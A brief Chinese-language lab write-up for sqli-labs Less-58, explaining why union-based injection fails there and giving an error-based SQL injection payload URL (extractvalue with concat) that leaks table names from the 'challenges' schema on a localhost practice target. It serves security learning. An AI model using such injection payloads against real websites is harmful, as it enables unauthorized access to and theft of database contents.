Less-58

执行sql语句后,并没有返回数据库当中的数据,所以我们这里不能使用union联合注入,这里使用报错注入。

Payload:http://127.0.0.1/sqli-labs/Less-58/?id=-1'union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

Sqli-labs less 58

此处可进行修改上述的内容,构造payload即可进行注入,但是需要注意这里只有5次机会尝试。

相关文章:

  • 2021-10-28
  • 2021-09-24
  • 2021-06-02
  • 2021-09-22
  • 2022-01-20
  • 2021-09-12
  • 2021-09-27
  • 2021-09-07
猜你喜欢
  • 2021-07-17
  • 2021-08-31
  • 2021-10-26
  • 2021-10-31
  • 2021-04-23
  • 2021-12-16
  • 2021-09-14
相关资源
相似解决方案